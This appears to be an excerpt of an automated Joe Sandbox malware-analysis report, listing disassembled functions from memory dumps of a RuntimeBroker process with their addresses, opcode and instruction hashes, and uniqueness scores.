7ffd9b8bbaf1-7ffd9b8bbafe 1384->1390 1385->1384 1386->1396 1387->1386 1393 7ffd9b8bbb05-7ffd9b8bbb0d 1390->1393 1394 7ffd9b8bbb00 1390->1394 1393->1389 1394->1393 1396->1358
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b165af0306b367a8168bc85345fd431deb916d1bc28d326fa2f729015517e658
                                                                                                                                      • Instruction ID: e7ea20babcd80ef10107116a608542220728b30f02a277cdee720afdf5369204
                                                                                                                                      • Opcode Fuzzy Hash: b165af0306b367a8168bc85345fd431deb916d1bc28d326fa2f729015517e658
                                                                                                                                      • Instruction Fuzzy Hash: 62C1DC70A0991D8FDBA8DF58C895BA9B3B1FF58305F1141E9D00DE72A5DA35AE81CF80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8BAF86 Relevance: .3, Instructions: 296COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b253999c4db7fc11e5785e400ab9dcb34ffe610ffce398d5516499cbec900087
                                                                                                                                      • Instruction ID: f061dc2085a612971c3daa5ccac17972ee5d859aa4b8e990d99a19ffa9fa4172
                                                                                                                                      • Opcode Fuzzy Hash: b253999c4db7fc11e5785e400ab9dcb34ffe610ffce398d5516499cbec900087
                                                                                                                                      • Instruction Fuzzy Hash: 37C1DD70E0991D8FDBA8DF58C895BA9B7B1FF58301F1141E9D00DE72A5DA35AA81CF80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8BAF99 Relevance: .3, Instructions: 292COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 151456ce1e90c512bd5d39b3e2dc2fbdb0ca334be6d9487208328c96e8c0d425
                                                                                                                                      • Instruction ID: 097c2cb5dcc1e1ccb886e0383353c6945b56af9f17b551aca86ec1e56266bbe2
                                                                                                                                      • Opcode Fuzzy Hash: 151456ce1e90c512bd5d39b3e2dc2fbdb0ca334be6d9487208328c96e8c0d425
                                                                                                                                      • Instruction Fuzzy Hash: 2BB1CD70A0991D8FDBA8DF58C895BA9B3B1FF58301F5141E9D00DE72A5DA35AA81CF80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8D9DAD Relevance: .3, Instructions: 269COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8d7000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 07438d131c40ce0b8e35966c849de48f97597928ba03f1abf701b83bed3e5955
                                                                                                                                      • Instruction ID: 37c069a3fa1ee488b44ebad786234aaf23ace6eef31c5cbd0435e680de8ed883
                                                                                                                                      • Opcode Fuzzy Hash: 07438d131c40ce0b8e35966c849de48f97597928ba03f1abf701b83bed3e5955
                                                                                                                                      • Instruction Fuzzy Hash: A6A1EC70E0961D8FDB94EF98C894AA9B7F2FF98304F5041A9D01EE7295DB34A981CB40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8D9E48 Relevance: .2, Instructions: 172COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8d7000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9974084614e3e1d922f4d762f8b9cfc867b7c041284cf69a4e9f01b776bc0f74
                                                                                                                                      • Instruction ID: fe1f75de5de0adeb619099456e53bec19674f2fa908722a73d00825e6be487fc
                                                                                                                                      • Opcode Fuzzy Hash: 9974084614e3e1d922f4d762f8b9cfc867b7c041284cf69a4e9f01b776bc0f74
                                                                                                                                      • Instruction Fuzzy Hash: 6561C870A1591D8FDB94EF58C8A4BA9B7F1FF58304F5041AAD01EE72A6DA34AD81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8D3000 Relevance: .2, Instructions: 162COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8d3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1963355fed70c49274b9c912351b435039777214ed53617b27a7e03dec388251
                                                                                                                                      • Instruction ID: 029c0ef5aa8b0cb0cf76ebc694c1d70c3715ddefd7e046ceb085c49469d5ba11
                                                                                                                                      • Opcode Fuzzy Hash: 1963355fed70c49274b9c912351b435039777214ed53617b27a7e03dec388251
                                                                                                                                      • Instruction Fuzzy Hash: 6751F27688E7C54FD3038BB09D616D07FF1AF17214B0A06DBD4848B0A3E66C5A4ADB62
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8A86A0 Relevance: .2, Instructions: 156COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8A6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A6000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8a6000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9194da20946d499045ec04593a7ced91de6e0cbb1b4c22d8a063f84b70f88945
                                                                                                                                      • Instruction ID: 336c666c8dbf9cbb80acd6b379a7864d6cb9db791061e9dbff9d11cd3d1b6736
                                                                                                                                      • Opcode Fuzzy Hash: 9194da20946d499045ec04593a7ced91de6e0cbb1b4c22d8a063f84b70f88945
                                                                                                                                      • Instruction Fuzzy Hash: 0751D470A1995D8FEBA0EB18C894BE9B7F1FB58300F4001EAA14DD32A1DE746AC1CF10
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B7039 Relevance: .1, Instructions: 138COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 067dff6b4a2d2679911af03b4f4c456783f868c40ffa38580cccb4134bba6df6
                                                                                                                                      • Instruction ID: 6a3bd50e2a5b49e512cb425841cf0b5c231a55609df720833b0b85fa8d126ccb
                                                                                                                                      • Opcode Fuzzy Hash: 067dff6b4a2d2679911af03b4f4c456783f868c40ffa38580cccb4134bba6df6
                                                                                                                                      • Instruction Fuzzy Hash: 1151A034A09A4D9FCF84EFA8D494EED7BF1FF58310B0501A6E409E7261D634E990CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8EA8A5 Relevance: .1, Instructions: 138COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 2fbf8bc32b45c6b4fa94c2685403ce8a1d13f1f5862515248320ed4742a78fad
                                                                                                                                      • Instruction ID: 5d7adcea12e9a029492768c91cc93bf095ee73b6475ae8b52d75dcd0e9f5b699
                                                                                                                                      • Opcode Fuzzy Hash: 2fbf8bc32b45c6b4fa94c2685403ce8a1d13f1f5862515248320ed4742a78fad
                                                                                                                                      • Instruction Fuzzy Hash: 6E51E470E0961D8AEB69EBA4C8A57EDB7B1FF58700F1101A9D01DA7292DE346A81CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8EAB84 Relevance: .1, Instructions: 102COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8a56b1b82d2b887f0f93210f9a1f6441b9b17d7a3cacaf3a2b14baaefda6ecb1
                                                                                                                                      • Instruction ID: f43c5c61b7249fd7b5d7922ebd25e7ef534e13843a3990c13fb634480176d5b0
                                                                                                                                      • Opcode Fuzzy Hash: 8a56b1b82d2b887f0f93210f9a1f6441b9b17d7a3cacaf3a2b14baaefda6ecb1
                                                                                                                                      • Instruction Fuzzy Hash: FB41E670E0561D8FEB69EF94D8A5BEDB7B1FF58300F1001A9D01DA3292DA346A81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8EF3D0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b59943666f5ecb6836dedc7d025524ebcc1dbe46051d505b90ca2c9b4df31f22
                                                                                                                                      • Instruction ID: 8abfe9ed7d22597d34a04bdd55358a51873962218c995c180c378f12320c59df
                                                                                                                                      • Opcode Fuzzy Hash: b59943666f5ecb6836dedc7d025524ebcc1dbe46051d505b90ca2c9b4df31f22
                                                                                                                                      • Instruction Fuzzy Hash: 03316D31E0A50D8BEB28EB84D8547FDB7B5FB59310F214279D009D7295CE786A85CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B6CC9 Relevance: .1, Instructions: 91COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1633dd0fe4fb348b5166ff36dcb9e338634752872d6dab4a5f2313f9cc5e5de3
                                                                                                                                      • Instruction ID: 3810b0e8db3b79ce92df1a2088da5ab0ae1a3ab732e18397463cab433670e677
                                                                                                                                      • Opcode Fuzzy Hash: 1633dd0fe4fb348b5166ff36dcb9e338634752872d6dab4a5f2313f9cc5e5de3
                                                                                                                                      • Instruction Fuzzy Hash: 24315E70A0964D8FDB55DF68C495AEDBBB1FF58314F06026AD849E3291CB34E941CBC1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8A89DC Relevance: .1, Instructions: 90COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8A6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A6000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8a6000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 06d461949c97fad1fbf10a8aa60f815845fcc3fd3358d026586a7c03fec3b6cb
                                                                                                                                      • Instruction ID: 92c4067a44b91ce74db8d23c1a1f6b8d970e238d165701111914427ab0ead26c
                                                                                                                                      • Opcode Fuzzy Hash: 06d461949c97fad1fbf10a8aa60f815845fcc3fd3358d026586a7c03fec3b6cb
                                                                                                                                      • Instruction Fuzzy Hash: 0131AD71A0591C8FDBA8DF14C895AE9B7B1FB58305F1001EE810EE3254CB759A81CF55
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8A0C2D Relevance: .1, Instructions: 85COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1eb0f232a8934e9433fdf277ad4bf52983006b4b5c6b444f0c272008b004beba
                                                                                                                                      • Instruction ID: 6a867997a6377db8e3c47701c023bf53da215c36068c4b3420968e13580899cb
                                                                                                                                      • Opcode Fuzzy Hash: 1eb0f232a8934e9433fdf277ad4bf52983006b4b5c6b444f0c272008b004beba
                                                                                                                                      • Instruction Fuzzy Hash: 8131F871E1D68E8FE7129BA4C8212B97BB0EF45314F0506B7D449971E2CA382605C761
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B9C08 Relevance: .1, Instructions: 78COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7aee4d7626d2ec9438b403ecf43df372cdce00f66822ec669b5674d77cbfb1c3
                                                                                                                                      • Instruction ID: 3ea8a6219d07199d66d6e2e63698593831677d02b677f936e9402bf1bc4bd82c
                                                                                                                                      • Opcode Fuzzy Hash: 7aee4d7626d2ec9438b403ecf43df372cdce00f66822ec669b5674d77cbfb1c3
                                                                                                                                      • Instruction Fuzzy Hash: DC318F31A0F25D9FE721DBA4C9642ED77F1FF19300F1105B6E409E61E2DA786A18CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B797D Relevance: .1, Instructions: 73COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 857900a0068b1c9294a293ac6daec2b15558b67e0bfae72576edbf22bbc56dff
                                                                                                                                      • Instruction ID: 8af113f75ee0d2b68ff2a42d72fa5feba963a29b425792ad7bc2f9d30d24f9a4
                                                                                                                                      • Opcode Fuzzy Hash: 857900a0068b1c9294a293ac6daec2b15558b67e0bfae72576edbf22bbc56dff
                                                                                                                                      • Instruction Fuzzy Hash: 70219F35A1966D8FDF19DF58C8616EDB7B1FB58310F01023AD406D32A1DB78A615CBC1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8AD212 Relevance: .1, Instructions: 72COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8A6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A6000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8a6000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9008f033d6bec055f32132ad541d0532df7bb956a1ce717fae5c501f1a7488ed
                                                                                                                                      • Instruction ID: ac0bf34d4ec258fef36aa7caf3edd70afe7cf3f604a83f5ee871b3bc15b49525
                                                                                                                                      • Opcode Fuzzy Hash: 9008f033d6bec055f32132ad541d0532df7bb956a1ce717fae5c501f1a7488ed
                                                                                                                                      • Instruction Fuzzy Hash: 8131C270E1562E8FEBB5EB54C858BB8B2F5AF58711F4140F9900DA62A1DE796BC0CF10
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8A11BE Relevance: .1, Instructions: 68COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f959e4febd96886a2f42398038375933e8d11fac6cb6ed6b9385bee2e91f18f0
                                                                                                                                      • Instruction ID: 85538d68fadcdf8b9ceb3a1f7c59970aaa3a80e204560627f5fbfcd3faa17ccb
                                                                                                                                      • Opcode Fuzzy Hash: f959e4febd96886a2f42398038375933e8d11fac6cb6ed6b9385bee2e91f18f0
                                                                                                                                      • Instruction Fuzzy Hash: 76211830A1891E8FDB94FFA8C8A49ADB7F1FF59301B11457AD009E32A5DB34E940CB50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8E437E Relevance: .1, Instructions: 68COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 53823228ff5de128e75d80221b094efdf397d56653e9ea5dcff56cfe6cec12a2
                                                                                                                                      • Instruction ID: 945b6a7ed6c00b2f9ae39c3dc2294d21d636f90539d099aa370feedec4afd9d1
                                                                                                                                      • Opcode Fuzzy Hash: 53823228ff5de128e75d80221b094efdf397d56653e9ea5dcff56cfe6cec12a2
                                                                                                                                      • Instruction Fuzzy Hash: 0321C370A0A5098FEB68EB84D464BACB7B1EB5D305F1541AEC01EE32A1CA756A518F04
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8ACF71 Relevance: .1, Instructions: 63COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8A6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A6000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8a6000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a7e643df03956ce1c72205e3f25864cc59de439dd9c62b2af15d7752ced69a9b
                                                                                                                                      • Instruction ID: 1844a6a19e248d8d9cfdd4397cf18c7acf8c62ce2b58acebbb37425a6d9c87e5
                                                                                                                                      • Opcode Fuzzy Hash: a7e643df03956ce1c72205e3f25864cc59de439dd9c62b2af15d7752ced69a9b
                                                                                                                                      • Instruction Fuzzy Hash: 7E21F970E1A62E8FEBB5DB44C8547B872F8AB08710F5100F9D00DA22A5DE785B85CF54
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8AD111 Relevance: .1, Instructions: 62COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8A6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A6000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8a6000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e9a54b99f536f01008cfa7d8498ca542766374185ed14f420868808d6eacf68b
                                                                                                                                      • Instruction ID: d52dda180352ad177acca834c0c42a8d95820405dbf1f505c055ecdc93a892d3
                                                                                                                                      • Opcode Fuzzy Hash: e9a54b99f536f01008cfa7d8498ca542766374185ed14f420868808d6eacf68b
                                                                                                                                      • Instruction Fuzzy Hash: B621B670D1562E8FDBA9DB54C8687E8B2B5EB58711F5140F9D00DA26A1DE746BC4CF00
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8A29D2 Relevance: .1, Instructions: 59COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0c4de90359acda7bf41c37b7390c7aab10abccf3faa0a1a2d4caf6e6227ec8eb
                                                                                                                                      • Instruction ID: 8df2e9e7a8578a4bee98ada852b2babd8a3e22e13438befc3a2cfc19eb2dd022
                                                                                                                                      • Opcode Fuzzy Hash: 0c4de90359acda7bf41c37b7390c7aab10abccf3faa0a1a2d4caf6e6227ec8eb
                                                                                                                                      • Instruction Fuzzy Hash: 53213870A0961E8FEB74EB18C9586E877F1EF59701F0401E9D04DD22A5DA752B81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8ECDA3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b4894e1832d76c20d5f52b6de81f7ab5b111315176ef875cbdb65813816122ef
                                                                                                                                      • Instruction ID: 6bd9ac12805209b3e447ebd579a4073a914fc0611cddbfff4dc5f6fc73c504a1
                                                                                                                                      • Opcode Fuzzy Hash: b4894e1832d76c20d5f52b6de81f7ab5b111315176ef875cbdb65813816122ef
                                                                                                                                      • Instruction Fuzzy Hash: 1111F931E0961E8EDBA8EB98C4697ECB7A1EB5C301F50417AD00EE3291CA3429A18F01
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B6E61 Relevance: .0, Instructions: 47COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7b6c3a2dbfe9280eaf0bba99acacfd85400de25e8b23b7bb1863ca915850fd41
                                                                                                                                      • Instruction ID: c562ff422dba1fe3a778023aaaa8dabc9b3597418ee2b18d1a00e818df441304
                                                                                                                                      • Opcode Fuzzy Hash: 7b6c3a2dbfe9280eaf0bba99acacfd85400de25e8b23b7bb1863ca915850fd41
                                                                                                                                      • Instruction Fuzzy Hash: 03015670A1968C8FCF85EF18C895AD97BF0FF19304F0501AAE849C7261D734E950CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B7355 Relevance: .0, Instructions: 46COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c070b63b5cb2226ea717d3732ecfdafd7f56bc673fa46b6a2e9b6d20a76d20d5
